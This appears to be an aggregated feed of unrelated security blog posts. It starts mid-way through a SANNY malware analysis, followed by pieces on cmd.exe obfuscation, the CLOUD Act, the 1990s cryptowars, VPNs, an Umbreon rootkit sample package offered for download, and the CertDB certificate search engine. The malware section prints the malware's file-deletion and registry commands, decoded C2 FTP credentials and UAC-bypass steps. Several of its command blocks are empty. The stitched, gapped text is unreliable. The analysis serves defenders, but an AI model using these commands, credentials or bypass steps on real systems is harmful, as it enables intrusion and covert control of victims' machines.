ipnet.dll is the main component inside the CAB file that is used for performing malicious activities. This DLL exports the following two functions:

  1. ServiceMain – Invoked when the hijacked system service, COMSysApp, is started.
  2. Post – Used to perform data exfiltration to the command and control (C2) server using FTP protocol.

The ServiceMain function first performs a check to see if it is being run in the context of svchost.exe or rundll32.exe. If it is being run in the context of svchost.exe, then it will first start the system service before proceeding with the malicious activities. If it is being run in the context of rundll32.exe, then it performs the following activities:

  1. Deletes the module NTWDBLIB.DLL from the disk using the following command:

    cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL

  2. Sets the code page on the system to 65001, which corresponds to UTF-8:

    cmd /c REG ADD HKCU\Console /v CodePage /t REG_DWORD /d 65001 /f

Command and Control (C2) Communication

SANNY malware uses the FTP protocol as the C2 communication channel.

FTP Config File

The FTP configuration information used by SANNY malware is encoded and stored inside ipnet.ini.

This file is Base64 encoded using the following custom character set: SbVIn=BU/dqNP2kWw0oCrm9xaJ3tZX6OpFc7Asi4lvuhf-TjMLRQ5GKeEHYgD1yz8

Upon decoding the file, the following credentials can be recovered:

  • FTP Server: ftp.capnix[.]com
  • Username: cnix_21072852
  • Password: vlasimir2017

It then continues to perform the connection to the FTP server decoded from the aforementioned config file, and sets the current directory on the FTP server as “htdocs” using the FtpSetCurrentDirectoryW function.

System Information Collection

For reconnaissance purposes, SANNY malware executes commands on the system to collect information, which is sent to the C2 server.

System information is gathered from the machine using the following command:

The list of running tasks on the system is gathered by executing the following command:

C2 Commands

After successful connection to the FTP server decoded from the configuration file, the malware searches for a file containing the substring “to everyone” in the “htdocs” directory. This file will contain C2 commands to be executed by the malware.

Upon discovery of the file with the “to everyone” substring, the malware will download the file and then performs actions based on the following command names:

  • chip command: This command deletes the existing ipnet.ini configuration file from the file system and creates a new ipnet.ini file with a specified configuration string. The chip commands allows the attacker to migrate malware to a new FTP C2 server. The command has the following syntax: 

  • pull command: This command is used for the purpose of data exfiltration. It has the ability to upload an arbitrary file from the local filesystem to the attacker’s FTP server. The command has the following syntax:

The uploaded file is compressed and encrypted using the routine described later in the Compression and Encoding Data section.

  • put command: This command is used to copy an existing file on the system to a new location and delete the file from the original location. The command has the following syntax:

  • default command: If the command begins with the substring “cmd /c”, but it is not followed by either of the previous commands (chip, pull, and put), then it directly executes the command on the machine using WinExec.
  • /user command: This command will execute a command on the system as the logged in user. The command duplicates the access token of “explorer.exe” and spawns a process using the following steps:

    1. Enumerates the running processes on the system to search for the explorer.exe process and obtain the process ID of explorer.exe.
    2. Obtains the access token for the explorer.exe process with the access flags set to 0x000F01FF.
    3. Starts the application (defined in the C2 command) on the system by calling the CreateProcessAsUser function and using the access token obtained in Step 2.

C2 Command



Update the FTP server config file


Upload a file from the machine


Copy an existing file to a new destination


Create a new process with explorer.exe access token

default command

Execute a program on the machine using WinExec()

Compression and Encoding Data

SANNY malware uses an interesting mechanism for compressing the contents of data collected from the system and encoding it before exfiltration. Instead of using an archiving utility, the malware leverages Shell.Application COM object and calls the CopyHere method of the IShellDispatch interface to perform compression as follows:

  1. Creates an empty ZIP file with the name: in the %temp% directory.
  2. Writes the first 16 bytes of the PK header to the ZIP file.
  3. Calls the CopyHere method of IShellDispatch interface to compress the collected data and write to
  4. Reads the contents of to memory.
  5. Deletes from the disk.
  6. Creates an empty file, post.txt, in the %temp% directory.
  7. The file contents are Base64 encoded (using the same custom character set mentioned in the previous FTP Config File section) and written to the file: %temp%\post.txt.
  8. Calls the FtpPutFileW function to write the contents of post.txt to the remote file with the format: “from <computer_name_timestamp>.txt”

Execution on Windows 7 and User Account Control (UAC) Bypass

NTWDBLIB.dll – This component from the CAB file will be extracted to the %windir%\system32 directory. After this, the cliconfg command is executed by the BAT file.

The purpose of this DLL module is to launch the install.bat file. The file cliconfg.exe is a legitimate Windows binary (SQL Client Configuration Utility), loads the library NTWDBLIB.dll upon execution. Placing a malicious copy of NTWDBLIB.dll in the same directory as cliconfg.exe is a technique known as DLL side-loading, and results in a UAC bypass.

Execution on Windows 10 and UAC Bypass

Update.dll – This component from the CAB file is used to perform UAC bypass on Windows 10. As described in the BAT File Analysis section, if the underlying operating system is Windows 10, then it uses update.dll to begin the execution of code instead of invoking the install.bat file directly.

The main actions performed by update.dll are as follows:

  1. Executes the following commands to setup the Windows registry for UAC bypass:

  2. Leverages a UAC bypass technique that uses the legitimate Windows binary, fodhelper.exe, to perform the UAC bypass on Windows 10 so that the install.bat file is executed with elevated privileges:

  3. Creates an additional BAT file, kill.bat, in the current directory to delete evidence of the UAC bypass. The BAT file kills the current process and deletes the components update.dll and kill.bat from the file system:


This activity shows us that the threat actors using SANNY malware are evolving their malware delivery methods, notably by incorporating UAC bypasses and endpoint evasion techniques. By using a multi-stage attack with a modular architecture, the malware authors increase the difficulty of reverse engineering and potentially evade security solutions.

Users can protect themselves from such attacks by disabling Office macros in their settings and practicing vigilance when enabling macros (especially when prompted) in documents, even if such documents are from seemingly trusted sources.

Indicators of Compromise

SHA256 Hash

Original Filename


РГНФ 2018-2019.doc



Copy of communication from Security Council Committee (1718).doc



a2e897c03f313a097dc0f3c5245071fbaeee316cfb3f07785932605046697170 (64-bit)

a3b2c4746f471b4eabc3d91e2d0547c6f3e7a10a92ce119d92fa70a6d7d3a113 (32-bit)

DOSfuscation: Exploring the Depths of Cmd.exe Obfuscation and Detection Techniques

Skilled attackers continually seek out new attack vectors, while employing evasion techniques to maintain the effectiveness of old vectors, in an ever-changing defensive landscape. Many of these threat actors employ obfuscation frameworks for common scripting languages such as JavaScript and PowerShell to thwart signature-based detections of common offensive tradecraft written in these languages.

However, as defenders' visibility into these popular scripting languages increases through better logging and defensive tooling, some stealthy attackers have shifted their tradecraft to languages that do not support this additional visibility. At a minimum, determined attackers are adding dashes of simple obfuscation to previously detected payloads and commands to break rigid detection rules.

In this DOSfuscation white paper, first presented at Black Hat Asia 2018, I showcase nine months of research into several facets of command line argument obfuscation that affect static and dynamic detection approaches. Beginning with cataloguing a half-dozen characters with significant obfuscation capabilities (only two of which I have identified being used in the wild), I then highlight the static detection evasion capabilities of environment variable substring encoding. Combining these techniques, I unveil four never-before-seen payload obfuscation approaches that are fully compatible with any input command on cmd.exe's command line. These obfuscation capabilities de-obfuscate in the current cmd.exe session for both interactive and noninteractive sessions, and avoid all command line logging. Finally, I discuss the building blocks required for these new encoding and obfuscation capabilities and outline several approaches that defenders can take to begin detecting this genre of obfuscation.

As a Senior Applied Security Researcher with FireEye's Advanced Practices Team, I am tasked with researching, developing and deploying new detection capabilities to FireEye's detection platform to stay ahead of advanced threat actors and their ever-changing tactics, techniques and procedures. FireEye customers have been benefiting from multiple layers of innovative obfuscation detection capabilities developed and deployed over the past nine months as a direct result of this research.

Download the DOSfuscation white paper today.

Daniel Bohannon (@danielhbohannon) is a Senior Applied Security Researcher on FireEye's Advanced Practices Team.

The CLOUD Act: a danger to journalists worldwide

el sisi
Wikimedia Commons

UPDATE: The Omnibus bill, which included the CLOUD Act, was passed by the Senate on Thursday night and signed into law by President Trump on Friday afternoon.

Congress is on the verge of passing a dangerous bill, known as the Clarifying Lawful Overseas Use of Data Act (“CLOUD Act”), which will have disastrous implications for privacy, as it would allow foreign governments to access private data on American soil while circumventing important privacy protections. In particular, it poses a serious threat to foreign journalists who report on repressive regimes.

Current laws dictate that a foreign prosecutor who wants to access data stored by American companies cannot do so directly, since they lack jurisdiction. Instead, they have to go through the “mutual legal assistance treaty” (MLAT) process—which requires sign off from the Justice Department and an order by a judge in each individual case.

MLATs are agreements between two countries in which each agrees to help the other with criminal investigations. The U.S. has signed MLATs with more than 60 countries.

But under the CLOUD Act, instead of relying on the MLAT process, foreign governments could bypass this system and instead demand data directly from technology companies in the United States if they negotiate a blanket agreement with the executive branch.

This poses a real risk for journalists in repressive regimes who rely on internet services provided by American technology companies. For example, say that a journalist in a country like Egypt uses Gmail, and therefore some of their emails are stored on one of Google’s server farms in the United States. In recent years, Egypt has aggressively cracked down on dissent and put hundreds of journalists in jail on politically-motivated charges of terrorism.

Egypt is a strong U.S. ally, and the country currently has an MLAT with the United States. The CLOUD Act gives the power to certify governments under this act to the Trump administration. Trump has heaped praise on Egypt’s military dictator Abdel Fattah el-Sisi. So would his Justice Department give Egypt a blanket certification to proceed under the CLOUD Act?

If the Trump administration does label Egypt a "qualifying foreign government," then whenever the Egyptian government decides that it wants access to a journalist’s emails stored in the United States in order to prosecute that journalist, it could simply request that Google hand over the emails. The Justice Department does not need to approve each individual request, and neither does a federal judge.

Unless the technology company found a request so egregious that it goes to court to contest it, no federal judge would even know about the surveillance demand from a foreign government. Foreign governments would be given power to wiretap on U.S. soil in conversations that might involve U.S. persons.

To make matters worse, Congress has attached the CLOUD Act to this week’s $1.3 trillion Omnibus spending bill that includes allocation of funds to a wide variety of projects, including the border wall. On March 22, the United States House of Representatives passed the Omnibus spending bill. While it still must pass the Senate to become law, because the spending bill touches so many controversial issues, there will likely be no debate and no hearings on the CLOUD Act—despite its significance for the future of press and information freedom.

Proponents of the bill claim the process now is cumbersome and time consuming. It’s true the MLA process may takes time, but that’s for good reason: to ensure due process. It is immeasurably preferable to legislation that would expand law enforcement’s reach across the world. 

Writing in Lawfare, Neema Singh Guliana of the ACLU and Naureen Shah of Amnesty International point out the serious problems with the CLOUD Act’s approach:

"In such a situation, the only real fail-safe to prevent a technology company from inadvertently acceding to a harmful data request is the technology company itself. But would even a well-intentioned technology company, particularly a small one, have the expertise and resources to competently assess the risk that a foreign order may pose to a particular human rights activist? Would it know, as in the example above, when to view Turkey’s terrorism charges in a particular case as baseless? In many cases, companies would likely rely on the biased assessments by foreign courts and fulfill requests."

The CLOUD Act has worrying implications not just for everyone's privacy rights, but to the ability of journalists around the world to protect their data. Urge your representatives to oppose the Omnibus spending bill as long as it includes the dangerous CLOUD Act..

What Were the CryptoWars ?

F-Secure invites our fellows to share their expertise and insights. For more posts by Fennel, click here

In a previous article, I mentioned the cryptowars against the US government in the 1990s. Some people let me know that it needed more explanation. Ask and thou shalt receive! Here is a brief history of the 1990s cryptowars and cryptography in general.

Crypto in this case refers to cryptography (not crypto-currencies like BitCoin). Cryptography is a collection of clever ways for you protect information from prying eyes. It works by transforming the information into unreadable gobbledegook (this process is called encryption). If the cryptography is successful, only you and the people you want can transform the gobbledegook back to plain English (this process is called decryption).

People have been using cryptography for at least 2500 years. While we normally think of generals and diplomats using cryptography to keep battle and state plans secret, it was in fact used by ordinary people from the start. Mesopotamian merchants used crypto to protect their top secret sauces, lovers in ancient India used crypto to protect their messages, and mystics in ancient Egypt used crypto to keep more personal secrets.

However, until the 1970s, cryptography was not very sophisticated. Even the technically and logistically impressive Enigma machines, used by the Nazis in their repugnant quest for Slavic slaves and Jewish genocide, were just an extreme version of one of the simplest possible encryptions: a substitution cipher. In most cases simple cryptography worked fine, because most messages were time sensitive. Even if you managed to intercept a message, it took time to work out exactly how the message was encrypted and to do the work needed to break that cryptography. By the time you finished, it was too late to use the information.

World War II changed the face of cryptography for multiple reasons – the first was the widespread use of radio, which meant mass interception of messages became almost guaranteed instead of a matter of chance and good police work. The second reason was computers. Initially computers meant women sitting in rows doing mind-numbing mathematical calculations. Then later came the start of computers as we know them today, which together made decryption orders of magnitude faster. The third reason was concentrated power and money being applied to surveillance across the major powers (Britain, France, Germany, Russia) leading to the professionalization and huge expansion of all the relatively new spy agencies that we know and fear today.

The result of this huge influx of money and people to the state surveillance systems in the world’s richest countries (i.e. especially the dying British Empire, and then later America’s growing unofficial empire) was a new world where those governments expected to be able to intercept and read everything. For the first time in history, the biggest governments had the technology and the resources to listen to more or less any conversation and break almost any code.

In the 1970s, a new technology came on the scene to challenge this historical anomaly: public key cryptography, invented in secret by British spies at GCHQ and later in public by a growing body of work from American university researchers Merkle, Diffie, Hellman, Rivest, Sharmir, and Adleman. All cryptography before this invention relied on algorithm secrecy in some aspect – in other words the cryptography worked by having a magical secret method only known to you and your friends. If the baddies managed to capture, guess, or work out your method, decrypting your messages would become much easier.

This is what is known as “security by obscurity” and it was a serious problem from the 1940s on. To solve this, surveillance agencies worldwide printed thousands and thousands of sheets of paper with random numbers (one-time pads) to be shipped via diplomatic courier to embassies and spies around the world. Public key cryptography changed this: the invention meant that you could share a public key with the whole world, and share the exact details of how the encryption works, but still protect your secrets. Suddenly, you only had to guard your secret key, without ever needing to share it. Suddenly it didn’t matter if someone stole your Enigma machine to see exactly how it works and to copy it. None of that would help your adversary.

And because this was all normal mathematical research, it appeared in technical journals, could be printed out and go around the world to be used by anyone. Thus the US and UK governments’ surveillance monopoly was in unexpected danger. So what did they do? They tried to hide the research, and they treated these mathematics research papers as “munitions”. It became illegal to export these “weapons of war” outside the USA without a specific export license from the American government, just like for tanks or military aircraft.

This absurd situation persisted into the early 1990s when two new Internet-age inventions made their continued monopoly on strong cryptography untenable. Almost simultaneously, Zimmermann created a program (PGP) to make public key cryptography easy for normal people to use to protect their email and files, and Netscape created the first SSL protocols for protecting your connection to websites. In both cases, the US government tried to continue to censor and stop these efforts. Zimmermann was under constant legal threat, and Netscape was forced to make an “export-grade” SSL with dramatically weakened security. It was still illegal to download, use, or even see, these programs outside the USA.

But by then the tide had turned. People started setting up mirror websites for the software outside the USA. People started putting copies of the algorithm on their websites as a protest. Or wearing t-shirts with the working code (5 lines of Perl is all that’s needed). Or printing the algorithm on posters to put up around their universities and towns. In the great tradition of civil disobedience against injustice, geeks around the world were daring the governments to stop them, to arrest them. Both the EFF (Electronic Frontier Foundation) and the EPIC (Electronic Privacy Information Center) organizations were created as part of this fight for our basic (digital) civil rights.

In the end, the US government backed down. By the end of the 1990s, the absurd munitions laws still existed but were relaxed sufficiently to allow ordinary people to have basic cryptographic protection online. Now they could be protected when shopping at Amazon without worrying that their credit card and other information would be stolen in transit. Now they could be protected by putting their emails in an opaque envelope instead of sending all their private messages via postcard for anyone to read.

However that wasn’t the end of the story. Like in so many cases “justice too long delayed is justice denied”. The internet is becoming systematically protected by encryption in the last two years thanks to the amazing work of LetsEncrypt. However, we have spent almost 20 years sending most of our browsing and search requests via postcard, and that “export-grade” SSL the American government forced on Netscape in the 1990s is directly responsible for the existence of the DROWN attack putting many systems at risk even today.

Meanwhile, thanks to the legal threats, email encryption never took off. We had to wait until the last few years for the idea of protecting everybody’s communications with cryptography to become mainstream with instant messaging applications like Signal. Even with this, the US and UK governments continue to lead the fight to stop or break this basic protection for ordinary citizens, despite the exasperated mockery from everyone who understands how cryptography works.

WiTopia personalVPN review: It’s all about choices

WiTopia personalVPN in brief:

  • P2P allowed: Yes
  • Business location: Reston, VA
  • Number of servers: 300+
  • Number of country locations: 45
  • Cost: $50 (Basic) / $70 (Pro)
  • VPN protocol: OpenVPN (default)
  • Data encryption: AES-128
  • Data authentication: SHA2
  • Handshake encryption: TLSv1.2

I’ve grown to expect certain things from a VPN service: a nice-looking and easy-to-use desktop program, and extra features like double VPNs, dedicated torrent servers, or sometimes Netflix compatibility. PersonalVPN from WiTopia confounds all those expectations a little, but is still a great option to consider.

To read this article in full, please click here

Rootkit Umbreon / Umreon – x86, ARM samples

Pokémon-themed Umbreon Linux Rootkit Hits x86, ARM Systems
Research: Trend Micro

There are two packages
one is 'found in the wild' full and a set of hashes from Trend Micro (all but one file are already in the full package)


Download Email me if you need the password  

File information

Part one (full package)

#File NameHash ValueFile Size (on Disk)Duplicate?
1.umbreon-ascii0B880E0F447CD5B6A8D295EFE40AFA376085 bytes (5.94 KiB)
2autoroot1C5FAEEC3D8C50FAC589CD0ADD0765C7281 bytes (281 bytes)
3CHANGELOGA1502129706BA19667F128B44D19DC3C11 bytes (11 bytes)
4cli.shC846143BDA087783B3DC6C244C2707DC5682 bytes (5.55 KiB)
5hideportsD41D8CD98F00B204E9800998ECF8427E0 bytes ( bytes)Yes, of file promptlog
6install.sh9DE30162E7A8F0279E19C2C30280FFF85634 bytes (5.5 KiB)
7Makefile0F5B1E70ADC867DD3A22CA62644007E5797 bytes (797 bytes)
8portchecker006D162A0D0AA294C85214963A3D3145113 bytes (113 bytes)
9promptlogD41D8CD98F00B204E9800998ECF8427E0 bytes ( bytes)
10readlink.c42FC7D7E2F9147AB3C18B0C4316AD3D81357 bytes (1.33 KiB)
11ReadMe.txtB7172B364BF5FB8B5C30FF528F6C51252244 bytes (2.19 KiB)
12setup694FFF4D2623CA7BB8270F5124493F37332 bytes (332 bytes)
13spytty.sh0AB776FA8A0FBED2EF26C9933C32E97C1011 bytes (1011 bytes)Yes, of file
14umbreon.c91706EF9717176DBB59A0F77FE95241C1007 bytes (1007 bytes)
15access.c7C0A86A27B322E63C3C29121788998B8713 bytes (713 bytes)
16audit.cA2B2812C80C93C9375BFB0D7BFCEFD5B1434 bytes (1.4 KiB)
17chown.cFF9B679C7AB3F57CFBBB852A13A350B22870 bytes (2.8 KiB)
18config.h980DEE60956A916AFC9D2997043D4887967 bytes (967 bytes)
19config.h.dist980DEE60956A916AFC9D2997043D4887967 bytes (967 bytes)Yes, of file config.h
20dirs.c46B20CC7DA2BDB9ECE65E36A4F987ABC3639 bytes (3.55 KiB)
21dlsym.c796DA079CC7E4BD7F6293136604DC07B4088 bytes (3.99 KiB)
22exec.c1935ED453FB83A0A538224AFAAC71B214033 bytes (3.94 KiB)
23getpath.h588603EF387EB617668B00EAFDAEA393183 bytes (183 bytes)
24getprocname.hF5781A9E267ED849FD4D2F5F3DFB8077805 bytes (805 bytes)
25includes.hF4797AE4B2D5B3B252E0456020F58E59629 bytes (629 bytes)
26kill.cC4BD132FC2FFBC84EA5103ABE6DC023D555 bytes (555 bytes)
27links.c898D73E1AC14DE657316F084AADA58A02274 bytes (2.22 KiB)
28local-door.c76FC3E9E2758BAF48E1E9B442DB98BF8501 bytes (501 bytes)
29lpcap.hEA6822B23FE02041BE506ED1A182E5CB1690 bytes (1.65 KiB)
30maps.c9BCD90BEA8D9F9F6270CF2017F9974E21100 bytes (1.07 KiB)
31misc.h1F9FCC5D84633931CDD77B32DB1D50D02728 bytes (2.66 KiB)
32netstat.c00CF3F7E7EA92E7A954282021DD72DC41113 bytes (1.09 KiB)
33open.cF7EE88A523AD2477FF8EC17C9DCD7C028594 bytes (8.39 KiB)
34pam.c7A947FDC0264947B2D293E1F4D69684A2010 bytes (1.96 KiB)
35pam_private.h2C60F925842CEB42FFD639E7C763C7B012480 bytes (12.19 KiB)
36pam_vprompt.c017FB0F736A0BC65431A25E1A9D393FE3826 bytes (3.74 KiB)
37passwd.cA0D183BBE86D05E3782B5B24E2C964132364 bytes (2.31 KiB)
38pcap.cFF911CA192B111BD0D9368AFACA03C461295 bytes (1.26 KiB)
39procstat.c7B14E97649CD767C256D4CD6E4F8D452398 bytes (398 bytes)
40procstatus.c72ED74C03F4FAB0C1B801687BE200F063303 bytes (3.23 KiB)
41readwrite.cC068ED372DEAF8E87D0133EAC0A274A82710 bytes (2.65 KiB)
42rename.cC36BE9C01FEADE2EF4D5EA03BD2B3C05535 bytes (535 bytes)
43setgid.c5C023259F2C244193BDA394E2C0B8313667 bytes (667 bytes)
44sha256.h003D805D919B4EC621B800C6C239BAE0545 bytes (545 bytes)
45socket.c348AEF06AFA259BFC4E943715DB5A00B579 bytes (579 bytes)
46stat.cE510EE1F78BD349E02F47A7EB001B0E37627 bytes (7.45 KiB)
47syslog.c7CD3273E09A6C08451DD598A0F18B5701497 bytes (1.46 KiB)
48umbreon.hF76CAC6D564DEACFC6319FA167375BA54316 bytes (4.21 KiB)
49unhide-funcs.c1A9F62B04319DA84EF71A1B091434C644729 bytes (4.62 KiB)
50cryptpass.py2EA92D6EC59D85474ED7A91C8518E7EC192 bytes (192 bytes)
51environment.sh70F467FE218E128258D7356B7CE328F11086 bytes (1.06 KiB)
52espeon-connect.shA574C885C450FCA048E79AD6937FED2E247 bytes (247 bytes)
53espeon-shell9EEF7E7E3C1BEE2F8591A088244BE0CB2167 bytes (2.12 KiB)
54espeon.c499FF5CF81C2624B0C3B0B7E9C6D980D14899 bytes (14.55 KiB)
55listen.sh69DA525AEA227BE9E4B8D59ACFF4D717209 bytes (209 bytes)
56spytty.sh0AB776FA8A0FBED2EF26C9933C32E97C1011 bytes (1011 bytes)
57ssh-hidden.shAE54F343FE974302F0D31776B72D0987127 bytes (127 bytes)
58unfuck.c457B6E90C7FA42A7C46D464FBF1D68E2384 bytes (384 bytes)
59unhide-self.pyB982597CEB7274617F286CA80864F499986 bytes (986 bytes)
60listen.shF5BD197F34E3D0BD8EA28B182CCE7270233 bytes (233 bytes)

part 2 (those listed in the Trend Micro article)
#File NameHash ValueFile Size (on Disk)
1015a84eb1d18beb310e7aeeceab8b84776078935c45924b3a10aa884a93e28acA47E38464754289C0F4A55ED7BB556489375 bytes (9.16 KiB)
20751cf716ea9bc18e78eb2a82cc9ea0cac73d70a7a74c91740c95312c8a9d53aF9BA2429EAE5471ACDE820102C5B81597512 bytes (7.34 KiB)
30a4d5ffb1407d409a55f1aed5c5286d4f31fe17bc99eabff64aa1498c5482a5f0AB776FA8A0FBED2EF26C9933C32E97C1011 bytes (1011 bytes)
40ce8c09bb6ce433fb8b388c369d7491953cf9bb5426a7bee752150118616d8ffB982597CEB7274617F286CA80864F499986 bytes (986 bytes)
5122417853c1eb1868e429cacc499ef75cfc018b87da87b1f61bff53e9b8e86709EEF7E7E3C1BEE2F8591A088244BE0CB2167 bytes (2.12 KiB)
6409c90ecd56e9abcb9f290063ec7783ecbe125c321af3f8ba5dcbde6e15ac64aB4746BB5E697F23A5842ABCAED36C9146149 bytes (6 KiB)
74fc4b5dab105e03f03ba3ec301bab9e2d37f17a431dee7f2e5a8dfadcca4c234D0D97899131C29B3EC9AE89A6D49A23E65160 bytes (63.63 KiB)
88752d16e32a611763eee97da6528734751153ac1699c4693c84b6e9e4fb08784E7E82D29DFB1FC484ED277C70218781855564 bytes (54.26 KiB)
9991179b6ba7d4aeabdf463118e4a2984276401368f4ab842ad8a5b8b730885222B1863ACDC0068ED5D50590CF792DF057664 bytes (7.48 KiB)
10a378b85f8f41de164832d27ebf7006370c1fb8eda23bb09a3586ed29b5dbdddfA977F68C59040E40A822C384D1CEDEB6176 bytes (176 bytes)
11aa24deb830a2b1aa694e580c5efb24f979d6c5d861b56354a6acb1ad0cf9809bDF320ED7EE6CCF9F979AEFE451877FFC26 bytes (26 bytes)
12acfb014304b6f2cff00c668a9a2a3a9cbb6f24db6d074a8914dd69b43afa452584D552B5D22E40BDA23E6587B1BC532D6852 bytes (6.69 KiB)
13c80d19f6f3372f4cc6e75ae1af54e8727b54b51aaf2794fedd3a1aa463140480087DD79515D37F7ADA78FF5793A42B7B11184 bytes (10.92 KiB)
14e9bce46584acbf59a779d1565687964991d7033d63c06bddabcfc4375c5f1853BBEB18C0C3E038747C78FCAB3E0444E371940 bytes (70.25 KiB)

Is your VPN secure? How to check for leaks

A trustworthy virtual private network (VPN) is a good way to keep your internet usage secure and private whether at home or on public Wi-Fi. But just how private is your activity over a VPN? In other words, how do you know if the VPN is doing its job or if you’re unwittingly leaking information to prying eyes?

To find out, you first need to know what your computer looks like to the internet without a VPN running. Start by searching for what is my IP on Google. At the top of the search results, Google will report back your current public Internet Protocol (IP) address. That’s a good place to start, but there is more to your internet connection and its potential for leaks.

To read this article in full, please click here

CertDB is a free SSL certificate search engine and analysis platform

CertDB is a free SSL certificate search engine and analysis platform

How many times have you stumbled on the SSL certificate, and the only things that you cared about were Common Name (CN), DNS Names, Dates (issue and expiry)? Do you know SSL certificate can speak so much about you/ your firm? It can tell stories and motives; you can gather a good intelligence from them - which companies are hosting new domains, sub-domains; did they just revoke the last certificate? Or, why some firm switched its vendors/ CA(s)? We all have read that SSL certificates have always been the talk of the town for their inherent strength but weak issuance process, i.e. the chain of command relying on the Certificate Authorities, (aka the business firms) but haven't played with them in real-time. There are search engines available but none of them as comprehensive, fast and free as CertDB

There have been quite a few attacks and hacks where Certificate Authorities were targeted[1] by hacking groups[2] or even involved[3] directly. Even though the vast initiatives by browsers and firms to regularly monitor SSL certificates[4], improve browser behaviours for awareness[5] and revoke the bad ones has been highly appreciated, the pentesters often don't find much during the comprehensive assessment. Recently, there has been an uproar on the business interests of CA(s) with the issuance, so much so that some are being tagged as bad and untrusted CA[6] for not doing job well. Companies are moving aggressively to HTTPS especially with the recent introduction of LetsEncrypt Wildcard Certificates. But we haven't seen the use of all this information on a common platform to further analyse the certificates and assess their digital SSL footprint and gather valuable intelligence.

This is where CertDB steps in. A great project maintained by smart people and FREE forever[7] for the public. I spent last few weeks accessing their services, and the platform and my short verdict says - It is great! It does have some quirks, but highly recommended!

The and CertDB serve different objectives. while gets the data from certificate transparency (CT) logging system where "legit" CA submit the certs in "real time"; CertDB is based on the scanning the IPv4 segment, domains and "finding & analyzing" certificates - good or bad.

CertDB can also find self-signed certificates, which can not. Hence, CertDB can give a realistic view of HTTPS - which IP is using what certs, self-signed, invalid CA etc; while shows the "good" law-abiding view, per say.

What is CertDB?

CertDB is an Internet search engine for SSL certificates. In simple terms, it parses the certificate and then makes different fields indexable for the user to execute search queries. It indexes the following common information,
CertDB is a free SSL certificate search engine and analysis platform

Fields Details
Subject Country, State, Category, Serial Number, Locality, Organization, Common Name
Issuer Country, State, Locality, Organization, Common Name
Others Public Key IP Address related to the domain, Validity Dates
Fingerprint SHA1, SHA256 and MD5
Extensions Usage, Subject Key ID, Authority Key ID, ALT Names, Certificate Policies

Now once you have extracted these fields, you can query and generate intelligence around it. You have these fields available with a logical query, and can be clubbed together to make complex queries. CertDB also provides raw certificates, public key and json formatted certificate information available for download. Recently they have integrated Alexa Ranking with the domains/ IP addresses and all of this information has been filtered and is available as lists - top domains, top organizations, top countries, top issuers etc.

One such exciting list is "expiring certificates" where you can find the list of Domains/ Organizations whose certificates are about to expire. This kind of information can be convenient while auditing or assessing the firm's digital footprint.

Real-time updates

While the documentation says the CertDB continuously scans every reachable web-server, on the Internet; the lab tests are not conclusive. I have asked the team to clarify and shall publish the response as part of the interview once I have a confirmed reply. But, it's appreciable that once their scanner detects the certificate, the information is available for the public to perform the required analysis in near real-time.

Use Cases

While we have all the information extracted from the digital certificates, we have to filter the results to get the required information via GUI or API. The GUI is open to all and can be used to do such queries with search-box, but to use the API one has to register an account.

You can register at, and an API key shall be allotted to you to perform 1000 queries a day with maximum 1000 results per query.

Field Value
Method GET, POST
api_key <get your key post registration>
q Any query (just like in search interface)
response_type 0 — JSON list of the dictionary with found certificates with all details
1 — JSON list of found certificates in base64
2 — JSON list of distinct organizations from found certificates
3 — JSON list of distinct domains from found certificates

It takes 30 seconds to register and receive the API Key. Here are few examples of querying the right information,

  1. Search for Issuer "Godaddy" issued certificate for an "Italian region" domain/company.
    issuer:"" country:"Italy"
  2. Certificates issued to a subnet or IP range (example: Amazon Global IP Range:[8])
    cidr:"" (example: replace , with newline and only list first 10 results tr , '\n' | head -10
    CertDB is a free SSL certificate search engine and analysis platform
  3. Expiring in next ten days.
    expiring:"10 days"
  4. Expiring certificates in next seven days for Netflix organization
    expiring:"7 days" organization:"Netflix"
    CertDB is a free SSL certificate search engine and analysis platform
  5. New Certificates in last five days for Safeway Insurance Company (via API)
    new:"5 days" organization:"Safeway Insurance Company"
    CertDB is a free SSL certificate search engine and analysis platform

There can be many such cases where you would like to know the certificates issued to a firm in the past; or if the firm recently got a new domain/ sub-domain and looking for a new business line. I could think of the following interesting cases if I am doing an assessment,

  1. Dork all the subdomains; and then start negating in a loop as per the first result. -www to -www -test. Or, use a threat intel tool to gather the sub-domains and validate if they all have SSL certificates. Manually check, and report if some domains are not on HTTPS (Refer: Google will be hard on you if you are not on HTTPS!)
  2. If you are technically assessing a company, do check their domains names and Organization. q="organization:"Example Inc." and you will be surprised to see sometimes firms are not aware of the domains on their name, or certificate issued by them but not renewed on time.


While the service is great, there are few issues as well which the team is working on,

  1. The errors are not customized. If the API queries are wrong; it dumps a lot of debug data which must be removed.
  2. The API key cannot be re-generated or revoked. You may have to contact CertDB support to revoke it.
  3. The API Key can be used in a GET request. It is not recommended as it can be cached at many hops (example: proxy)
  4. The documentation is not comprehensive, and probably more detailed information is needed when using API calls.
  5. The site doesn't provide an example of API interaction. In my opinion, CertDB should write a page with few examples using Python, CURL, Ruby, Perl and other common languages including json parsing of the results.


It's been few weeks since I am using this service, and my frank opinion is it has great potential and use. I am using this service while assessing AWS instances, and Fortune 500 firms. I have also found some expiring certificates for the clients and informed them in due course of time. I would highly recommend you to have a look and register an account. You can also set a cron job to check the dates/ digital SSL footprint of an organization.

Next Steps: I shall soon be publishing an interview with their team asking for more details on the roadmap, competition, and improvements.

Cover Image Credit: Photo by Rubén Bagüés

  1. Comodo CA attack by Iranian hackers ↩︎

  2. Dutch DigiNotar attack by Iranian hackers ↩︎

  3. CEO Emails Private Keys ↩︎

  4. Certificate Transparency is important ↩︎

  5. A secure web by Google ↩︎

  6. Distrust of the Symantec PKI: Immediate action needed by site operators ↩︎

  7. In an exclusive interview with Cyber Sins, CERTDB confirms this "project" will always be free to use. ↩︎

  8. Amazon IP Range: ↩︎

Three Hacking Groups You Definitely Need to Know About

Hacker groups began to flourish in the early 1980s with the emergence of computer. Hackers are like predators that can access your private data at any time by exploiting the vulnerabilities of your computer. Hackers usually cover up their tracks by leaving false clues or by leaving absolutely no evidence behind. In the light of

The post Three Hacking Groups You Definitely Need to Know About appeared first on Hacker News Bulletin | Find the Latest Hackers News.

Why the Cyber Criminals at Synack need $25 Million to Track Down Main Safety Faults

The enormous number of hacks in 2014 have propelled information safety into the front of the news and the brains of many companies. Cyber attacks on big enterprises like Target, Sony, and Home Depot lately caused President Obama to call for partnership amongst the two sectors (private and public) in order to share the information

The post Why the Cyber Criminals at Synack need $25 Million to Track Down Main Safety Faults appeared first on Hacker News Bulletin | Find the Latest Hackers News.

